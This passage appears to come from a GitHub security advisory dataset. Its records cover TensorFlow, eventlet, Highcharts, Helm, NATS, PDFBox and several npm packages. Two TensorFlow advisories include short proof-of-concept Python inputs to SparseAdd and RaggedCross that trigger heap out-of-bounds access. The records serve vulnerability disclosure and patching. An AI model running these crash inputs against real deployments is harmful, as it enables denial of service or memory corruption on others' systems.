'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-pmpr-55fj-r229'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29598'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/6841e522a3e7d48706a02e8819836e809f738682'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:33:22Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-9p9m-jm8w-94p2,2021-05-07T14:31:05Z,2021-05-07T15:50:36Z,,['CVE-2021-21419'],Improper Handling of Highly Compressed Data (Data Amplification) and Memory Allocation with Excessive Size Value in eventlet,"### Impact +A websocket peer may exhaust memory on Eventlet side by sending very large websocket frames. Malicious peer may exhaust memory on Eventlet side by sending highly compressed data frame. + +### Patches +Version 0.31.0 restricts websocket frame to reasonable limits. + +### Workarounds +Restricting memory usage via OS limits would help against overall machine exhaustion. No workaround to protect Eventlet process. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [eventlet](https://github.com/eventlet/eventlet/issues) +* Contact current maintainers. At 2021-03: temotor@gmail.com or https://t.me/temotor","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'eventlet'}, 'ecosystem_specific': {'affected_functions': ['eventlet.websocket.WebSocket', 'eventlet.websocket.WebSocketWSGI']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10'}, {'fixed': '0.31.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/eventlet/eventlet/security/advisories/GHSA-9p9m-jm8w-94p2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21419'}, {'type': 'WEB', 'url': 'https://github.com/eventlet/eventlet/commit/1412f5e4125b4313f815778a1acb4d3336efcd07'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2WJFSBPLCNSZNHYQC4QDRDFRTEZRMD2L/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R5JZP4LZOSP7CUAM3GIRW6PIAWKH5VGB/'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T14:31:05Z', 'nvd_published_at': '2021-05-07T15:15:00Z'}" +1.4.0,GHSA-cjc7-49v2-jp64,2021-05-17T22:09:32Z,2021-05-21T14:28:29Z,,['CVE-2021-29609'],Incomplete validation in `SparseAdd`,"### Impact +Incomplete validation in `SparseAdd` results in allowing attackers to exploit undefined behavior (dereferencing null pointers) as well as write outside of bounds of heap allocated data: + +```python +import tensorflow as tf + +a_indices = tf.zeros([10, 97], dtype=tf.int64) +a_values = tf.zeros([10], dtype=tf.int64) +a_shape = tf.zeros([0], dtype=tf.int64) + +b_indices = tf.zeros([0, 0], dtype=tf.int64) +b_values = tf.zeros([0], dtype=tf.int64) +b_shape = tf.zeros([0], dtype=tf.int64) + +thresh = 0 + +tf.raw_ops.SparseAdd(a_indices=a_indices, + a_values=a_values, + a_shape=a_shape, + b_indices=b_indices, + b_values=b_values, + b_shape=b_shape, + thresh=thresh) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/656e7673b14acd7835dc778867f84916c6d1cac2/tensorflow/core/kernels/sparse_add_op.cc) has a large set of validation for the two sparse tensor inputs (6 tensors in total), but does not validate that the tensors are not empty or that the second dimension of `*_indices` matches the size of corresponding `*_shape`. This allows attackers to send tensor triples that represent invalid sparse tensors to abuse code assumptions that are not protected by validation. + +### Patches +We have patched the issue in GitHub commit [6fd02f44810754ae7481838b6a67c5df7f909ca3](https://github.com/tensorflow/tensorflow/commit/6fd02f44810754ae7481838b6a67c5df7f909ca3) followed by GitHub commit [41727ff06111117bdf86b37db198217fd7a143cc](https://github.com/tensorflow/tensorflow/commit/41727ff06111117bdf86b37db198217fd7a143cc). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cjc7-49v2-jp64'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29609'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/41727ff06111117bdf86b37db198217fd7a143cc'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/6fd02f44810754ae7481838b6a67c5df7f909ca3'}]","{'cwe_ids': ['CWE-665', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:09:32Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-9m6j-fcg5-2442,2022-05-26T20:41:41Z,2021-05-06T16:10:51Z,,['CVE-2021-27515'],Path traversal in url-parse,url-parse before 1.5.0 mishandles certain uses of backslash such as http:\/ and interprets the URI as a relative path.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'url-parse'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27515'}, {'type': 'WEB', 'url': 'https://github.com/unshiftio/url-parse/pull/197'}, {'type': 'WEB', 'url': 'https://github.com/unshiftio/url-parse/commit/d1e7e8822f26e8a49794b757123b51386325b2b0'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2021-4306'}, {'type': 'PACKAGE', 'url': 'https://github.com/unshiftio/url-parse'}, {'type': 'WEB', 'url': 'https://github.com/unshiftio/url-parse/compare/1.4.7...1.5.0'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/02/msg00030.html'}]","{'cwe_ids': ['CWE-23'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T21:04:52Z', 'nvd_published_at': '2021-02-22T00:15:00Z'}" +1.4.0,GHSA-j47f-4232-hvv8,2021-05-18T22:54:15Z,2021-05-21T14:22:17Z,,['CVE-2021-29532'],Heap out of bounds read in `RaggedCross`,"### Impact +An attacker can force accesses outside the bounds of heap allocated arrays by passing in invalid tensor values to `tf.raw_ops.RaggedCross`: + +```python +import tensorflow as tf + +ragged_values = [] +ragged_row_splits = [] +sparse_indices = [] +sparse_values = [] +sparse_shape = [] + +dense_inputs_elem = tf.constant([], shape=[92, 0], dtype=tf.int64) +dense_inputs = [dense_inputs_elem] + +input_order = ""R"" +hashed_output = False +num_buckets = 0 +hash_key = 0 + +tf.raw_ops.RaggedCross(ragged_values=ragged_values, + ragged_row_splits=ragged_row_splits, + sparse_indices=sparse_indices, + sparse_values=sparse_values, + sparse_shape=sparse_shape, + dense_inputs=dense_inputs, + input_order=input_order, + hashed_output=hashed_output, + num_buckets=num_buckets, + hash_key=hash_key, + out_values_type=tf.int64, + out_row_splits_type=tf.int64) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/efea03b38fb8d3b81762237dc85e579cc5fc6e87/tensorflow/core/kernels/ragged_cross_op.cc#L456-L487) lacks validation for the user supplied arguments: + +```cc +int next_ragged = 0; +int next_sparse = 0; +int next_dense = 0; +for (char c : input_order_) { + if (c == 'R') { + TF_RETURN_IF_ERROR(BuildRaggedFeatureReader( + ragged_values_list[next_ragged], ragged_splits_list[next_ragged], + features)); + next_ragged++; + } else if (c == 'S') { + TF_RETURN_IF_ERROR(BuildSparseFeatureReader( + sparse_indices_list[next_sparse], sparse_values_list[next_sparse], + batch_size, features)); + next_sparse++; + } else if (c == 'D') { + TF_RETURN_IF_ERROR( + BuildDenseFeatureReader(dense_list[next_dense++], features)); + } + ... +} +``` + +Each of the above branches call a helper function after accessing array elements via a `*_list[next_*]` pattern, followed by incrementing the `next_*` index. However, as there is no validation that the `next_*` values are in the valid range for the corresponding `*_list` arrays, this results in heap OOB reads. + +### Patches +We have patched the issue in GitHub commit [44b7f486c0143f68b56c34e2d01e146ee445134a](https://github.com/tensorflow/tensorflow/commit/44b7f486c0143f68b56c34e2d01e146ee445134a). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-j47f-4232-hvv8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29532'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/44b7f486c0143f68b56c34e2d01e146ee445134a'}]","{'cwe_ids': ['CWE-125'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T22:54:15Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-8j65-4pcq-xq95,2022-06-06T18:17:02Z,2021-05-06T15:45:03Z,,['CVE-2021-29489'],Options structure open to Cross-site Scripting if passed unfiltered,"### Impact +In Highcharts versions 8 and earlier, the chart options structure was not systematically filtered for XSS vectors. The potential impact was that content from untrusted sources could execute code in the end user's browser. Especially when using the `useHTML` flag, HTML string options would be inserted unfiltered directly into the DOM. When `useHTML` was false, malicious code could be inserted by using various character replacement tricks or malformed HTML. + +If your chart configuration comes from a trusted source like a static setup or pre-filtered HTML (or no markup at all in the configuration), you are not impacted. + +### Patches +In version 9, the whole rendering layer was refactored to use an DOMParser, an AST and tag and HTML allow-listing to make sure only safe content entered the DOM. In addition, prototype pollution was stopped. + +### Workarounds +Implementers who are not able to upgrade may apply [DOMPurify](https://github.com/cure53/DOMPurify) recursively [to the options structure](https://jsfiddle.net/highcharts/zd3wcm5L/) to filter out malicious markup. + +### References +* Details on the improved [Highcharts security](https://www.highcharts.com/docs/chart-concepts/security) +* [The AST and TextBuilder refactoring](https://github.com/highcharts/highcharts/pull/14913) +* [The fix for prototype pollution](https://github.com/highcharts/highcharts/pull/14884) + +### For more information +If you have any questions or comments about this advisory: +* Visit our [support page](https://www.highcharts.com/blog/support/) +* For more Email us at [security@highcharts.com](mailto:security@highcharts.com) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'highcharts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/highcharts/highcharts/security/advisories/GHSA-8j65-4pcq-xq95'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29489'}, {'type': 'PACKAGE', 'url': 'https://github.com/highcharts/highcharts'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210622-0005/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/highcharts'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T15:37:11Z', 'nvd_published_at': '2021-05-05T16:15:00Z'}" +1.4.0,GHSA-jm56-5h66-w453,2022-08-11T16:35:01Z,2021-05-24T16:57:06Z,,['CVE-2020-15185'],Repository index file allows for duplicates of the same chart entry in helm,"### Impact + +During a security audit of Helm's code base, security researchers at Trail of Bits identified a bug in which the a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. + +To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL connection). + +### Patches + +This issue has been patched in Helm 3.3.2 and 2.16.11 + +### Workarounds + +- do not install charts from repositories you do not trust +- fetch charts using a secure channel of communication (such as TLS) +- use `helm pull` to fetch the chart, then review the chart’s content (either manually, or with `helm verify` if it has been signed) to ensure it has not been tampered with +- manually review the index file in the Helm repository cache before installing software.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.3.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.16.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3/pkg/repo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.16.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3/pkg/repo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/helm/helm/security/advisories/GHSA-jm56-5h66-w453'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15185'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/commit/055dd41cbe53ce131ab0357524a7f6729e6e40dc'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/commit/6aab63765f99050b115f0aec3d6350c85e8da946'}]","{'cwe_ids': ['CWE-20', 'CWE-694', 'CWE-74'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T16:47:58Z', 'nvd_published_at': '2020-09-17T22:15:00Z'}" +1.4.0,GHSA-c7m7-4257-h698,2021-05-05T21:29:36Z,2021-05-06T17:29:13Z,,['CVE-2020-7702'],Prototype Pollution in templ8,All versions of package templ8 up to and including 0.0.44 are vulnerable to Prototype Pollution via the parse function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'templ8'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.44'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7702'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TEMPL8-598770'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T21:29:36Z', 'nvd_published_at': '2020-08-17T14:15:00Z'}" +1.4.0,GHSA-jp4j-47f9-2vc3,2023-09-29T16:33:59Z,2021-05-18T18:14:55Z,,['CVE-2019-13126'],Integer Overflow or Wraparound in NATS Server,"An integer overflow in NATS Server before 2.2.0 allows a remote attacker to crash the server by sending a crafted request. + +### Specific Go Packages Affected +github.com/nats-io/nats-server/v2/server","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/nats-io/nats-server/v2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-13126'}, {'type': 'WEB', 'url': 'https://github.com/nats-io/nats-server/pull/1053'}, {'type': 'WEB', 'url': 'https://github.com/nats-io/nats-server/pull/1441'}, {'type': 'WEB', 'url': 'https://github.com/nats-io/nats-server/commit/07ef71ff98f45f8c2711be4aeaf484610d891dda'}, {'type': 'WEB', 'url': 'https://github.com/nats-io/nats-server/commits/master'}, {'type': 'WEB', 'url': 'https://www.twistlock.com/labs-blog/finding-dos-vulnerability-nats-go-fuzz-cve-2019-13126/'}]","{'cwe_ids': ['CWE-190'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T16:35:04Z', 'nvd_published_at': '2019-07-29T17:15:00Z'}" +1.4.0,GHSA-qr4m-jcvc-3382,2021-05-05T18:52:45Z,2021-05-06T18:12:00Z,,['CVE-2020-7717'],Prototype Pollution in dot-notes,All versions of package dot-notes up to and including version 3.2.0 are vulnerable to Prototype Pollution via the create function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'dot-notes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7717'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DOTNOTES-598668'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T18:52:45Z', 'nvd_published_at': '2020-09-01T10:15:00Z'}" +1.4.0,GHSA-gr58-j5wh-m333,2021-05-05T21:33:21Z,2021-05-06T17:29:08Z,,['CVE-2020-7703'],Prototype Pollution in nis-utils,All versions of package nis-utils up to and including 0.6.10 are vulnerable to Prototype Pollution via the setValue function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nis-utils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.6.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7703'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NISUTILS-598799'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T21:33:21Z', 'nvd_published_at': '2020-08-17T15:15:00Z'}" +1.4.0,GHSA-x5r6-x823-9848,2023-09-05T22:44:45Z,2021-05-10T19:15:43Z,,['CVE-2020-7766'],Arbitrary Code Execution in json-ptr,"npm `json-ptr` before 2.1.0 has an arbitrary code execution vulnerability. The issue occurs in the [set operation](https://flitbit.github.io/json-ptr/classes/_src_pointer_.jsonpointer.htmlset) when the force flag is set to true. The function recursively set the property in the target object, however it does not properly check the key being set, leading to a prototype pollution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'json-ptr'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7766'}, {'type': 'WEB', 'url': 'https://github.com/418sec/json-ptr/pull/3'}, {'type': 'WEB', 'url': 'https://github.com/flitbit/json-ptr/commit/2539e3494c80af1eef24f0f433654a61f255f011'}, {'type': 'WEB', 'url': 'https://github.com/flitbit/json-ptr/blob/master/src/util.ts%23L174'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038396'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSONPTR-1016939'}, {'type': 'WEB', 'url': 'https://www.huntr.dev/bounties/2-npm-json-ptr/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/json-ptr'}]","{'cwe_ids': ['CWE-1321', 'CWE-400', 'CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T23:01:34Z', 'nvd_published_at': '2020-11-10T16:15:00Z'}" +1.4.0,GHSA-6vqp-h455-42mr,2021-10-21T17:32:17Z,2021-05-13T22:30:13Z,,['CVE-2021-27906'],Uncontrolled Memory Allocation in Apache PDFBox,A carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.pdfbox:pdfbox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.23'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27906'}, {'type': 'WEB', 'url': 'https://github.com/apache/pdfbox/commit/8c47be1011c11dc47300faecffd8ab32fba3646f'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/pdfbox'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/PDFBOX-5112'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1218e60c32829f76943ecaca79237120c2ec1ab266459d711a578b50@%3Cdev.pdfbox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1d268642f8b52456ee8f876b888b8ed7a9e9568c7770789f3ded7f9e@%3Ccommits.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4cbc3f6981cd0a1a482531df9d44e4c42a7f63342a7ba78b7bff8a1b@%3Cnotifications.james.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r54594251369e14c185da9662a5340a52afbbdf75d61c9c3a69c8f2e8@%3Cdev.pdfbox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5c8e2125d18af184c80f7a986fbe47eaf0d30457cd450133adc235ac@%3Ccommits.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r64982b768c8a2220b07aaf813bd099a9863de0d13eb212fd4efe208f@%3Cusers.pdfbox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6e067a6d83ccb6892d0ff867bd216704f21fb0b6a854dea34be04f12@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7ee634c21816c69ce829d0c41f35afa2a53a99bdd3c7cce8644fdc0e@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ffe179385637b0b5cbdabd0246118005b4b8232909d2d14cd68ccd3@%3Ccommits.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raa35746227f3f8d50fff1db9899524423a718f6f35cd39bd4769fa6c@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc69140d894c6a9c67a8097a25656cce59b46a5620c354ceba10543c3@%3Cnotifications.ofbiz.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdf78aef4793362e778e21e34328b0456e302bde4b7e74f229df0ee04@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 